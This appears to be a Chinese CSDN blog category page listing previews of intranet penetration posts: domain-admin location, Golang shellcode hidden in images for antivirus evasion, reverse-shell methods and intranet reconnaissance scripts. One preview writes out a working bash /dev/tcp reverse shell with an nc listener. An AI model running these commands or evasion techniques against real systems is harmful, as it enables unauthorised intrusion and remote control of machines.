![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
内网
文章平均质量分 84
土豆.exe
部分内容已涉密隐藏
展开
-
内网渗透-域管理员定位
目录Part1 内网域渗透基础概念1 什么是域1. 权限管理比较集中,管理成本降低2. 保密性加强3. 安全性加强4. 提高了便捷性2 域渗透思路Part2 域管理员定位基础Part3 域管理员手动定位Part4 自动化收集时常用的域管理员定位工具SPN扫描psloggedon.exePVEFindADUser.exenetview.exeName的NSE脚本PowerView.PS1脚本Part1 内网域渗透基础概念1 什么是...原创 2022-02-08 22:55:32 · 78902 阅读 · 1 评论 -
Golang图片码+压缩伪装+远程调用组合拳
Part1 主要免杀思路首先要将程序进行分离,将shellcode隐藏进图片里,再远程调用图片里的shellcode,达成getshell的目标。同时还要把调用shellcode的执行程序进行伪装,伪装成图片或者其他格式,让目标执行文件时自动拉取shellcode图片,从而上线本篇文章使用了开源项目 https://github.com/Hangingsword/HouQing此处举例用的是Hou Qing大佬基于Golang语言编写的免杀项目Part2 具体过程及手法我们要先保..原创 2021-12-31 11:54:28 · 73273 阅读 · 0 评论 -
论内网渗透中,反弹shell的各种姿势
反弹shell是进入内网的第一步,也是权限提升用到的至关重要的一步。1、bash反弹 攻击机: nc -lvp 4444 客户机: bash -i>& /dev/tcp/10.1.2.2/4444 0>&1命令介绍:nc -i使用监听模式 -v 显示命令执行过程 -p 指定端口号。 -e 执行给定的命令 bash -i使用交互模式, -c 执行跟的命令 重定向 0:标准输入,原创 2021-12-13 10:30:01 · 73228 阅读 · 0 评论 -
内网信息收集(附脚本)
——D&X安全实验室文中脚本已上传至github:https://github.com/Potato-py/getIntrInfo可打包为可执行文件,可过360、火绒等渗透的本质就是信息收集,信息收集的深度与广度以及对关键信息的提取,影响了后续的方向和手法。当我们拿到webShell后,应该从内到外一步一步收集服务器信息、域信息以及环境信息等,从一个个细节中全面了解内网的部署。以下是总结的部分查询命令:当前用户:whoami /all...原创 2021-10-03 19:24:10 · 1203 阅读 · 10 评论